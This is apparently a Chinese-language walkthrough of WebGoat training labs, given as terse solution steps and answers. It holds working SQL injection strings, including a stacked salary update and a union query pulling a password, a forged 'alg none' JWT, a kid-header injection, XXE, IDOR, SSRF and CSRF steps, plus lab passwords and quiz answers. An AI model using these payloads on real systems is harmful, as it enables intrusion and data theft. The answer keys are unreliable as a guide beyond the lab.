直接拿去破解即可
我们搜索Bob的first_name即可搜索到Bob所在的部门了
select department from employees where first_name='Bob';
我们从上一关看到了Tobi的first_name,使用直接构造语句修改即可
update employees set department='Sales' where first_name='Tobi';
alter table employees add column phone varchar(20);
grant alter table to UnauthorizedUser
‘、or、’1’=’1
闭合前面,再让后面的语句构成or ‘1’=’1’即可
根据上面的sql语句构造下,由于没有单引号包裹,使用不用单引号闭合,直接给出or 1=1即可
根据sql语句,可以看到用单引号包裹了,这里闭合掉再加上我们的’or 1=1 -- -
后面再注释掉即可
我们要修改金额,直接闭合然后构造语句再把后面注释掉,从而让我们的金额成为最多
'; update employees set salary=9999999 where last_name='Smith';-- -
直接构造删除表语句即可
先闭合or 1=1遍历再查询dave的密码
'or 1=1 union select 1,'2','3','4','5',password, 7 from user_system_data where user_name='dave'--
账号tom 密码thisisasecretfortomonly
答案4、3、2、3、4
代码块
try{
Connection ct = null;
ct=DriverManager.getConnection(DBURL,DBUSER,DBPW);
PreparedStatement ps=ct.prepareStatement("select * from users where name=?");
ps.setString(1,"1");
ResultSet rs=ps.executeQuery();
} catch(Exception e){
System.out.println("123");
}
爆破可知104.130.219.202
抓包把这两个数字修改成4,3即可
先点击垃圾桶,然后抓包,会看到access_token的值我们用base64解密下
修改成alg位none、admin为true再加密替换即可
ewogICJhbGciOiAibm9uZSIKfQewogICJpYXQiOiAxNTg0MTY2NTI0LAogICJhZG1pbiI6ICJ0cnVlIiwKICAidXNlciI6ICJUb20iCn0ewogICJhbGciOiAibm9uZSIKfQ.ewogICJpYXQiOiAxNTg0MTY2NTI0LAogICJhZG1pbiI6ICJ0cnVlIiwKICAidXNlciI6ICJUb20iCn0.
先点击delete抓包,然后把token拿到https://jwt.io/#debugger那里修改
把kid修改成' union select 'YXhpbg==' from jwt_keys where id='webgoat_key
把username修改成Tom再把payload修改成axin再把左边的复制给burpsuite最后放包即可
这里直接用爆破得出是green
看两个即可
直接用burpsuite抓包即可
我们抓包把最下面换成
]>&root;
即可
内容还是修改上一关一样,Content-Type修改成application/xml即可
直接用tom和cat登录即可
检查元素中有个profile包查看响应会看到一些属性没有的就是role、userId了
输入role,userId即可
上一关包里已经说了有个Id为2342384的用户了
输入WebGoat/IDOR/profile/2342384即可
把包7BuserId修改成2342388即可
找到隐藏的信息即可
根据上一关知道的users路径我们访问一下再把content-type修改成 application/json即可获取hash来通关下一关XrEegsBjm6AGpHjw+HOvSVXifKbsyzqz63Nx9TTDrzQ=
当我们点击UpdateCart的时候会输出我们的卡号,直接输入我们的xss语句即可
输入start.mvc#test/即可
根据上一题的构造url
http://192.168.109.131:8081/WebGoat/start.mvc#test/webgoat.customjs.phoneHome()访问
可以看到一条语句,我们检查元素在控制台中输入webgoat.customjs.phoneHome()看到回显就是答案了提交即可
答案是4、3、1、2、4
先提交数据,抓包,生成poc,用浏览器测试,复制到url中,点击即可
方法和上一关一模一样
自己在本地搭建个html访问即可
这一题按照题目要求,注册个csrf-开头的用户,比如我的用户名为tntaxin,然后我再注册一个csrf-tntaxin,然后登录csrf-tntaxin访问这道题目,点击solved就过了,当然这题的真实目的是希望你构建一个csrf 恶意链接,然后访问这个链接就会自动登录csrf-tntaxin这个账户,这样受害者的访问记录你就都知道了。
抓包把image改成images%2Fjerry.png即可
同样抓包,就是把url换成http://ifconfig.pro即可
把参数简单修改下即可
简单抓包加些字母,绕过前端即可
检查元素发现有个Bartholomew用户的信息,看到了工资是450000,输入即可
点击Buy,抓包发送会看到code,正确的Code是get_it_for_free输入即可
我们把数字增多,以最低的价格买最多的家具
这个是要爆破的,密码是:!!webgoat_admin_1234!!
再把flag提交上去
用任意密码通过即可
1' or 1=1 -- -
我们直接评价抓包,把请求改成HEAD,就看到了flag,我们复制提交上去即可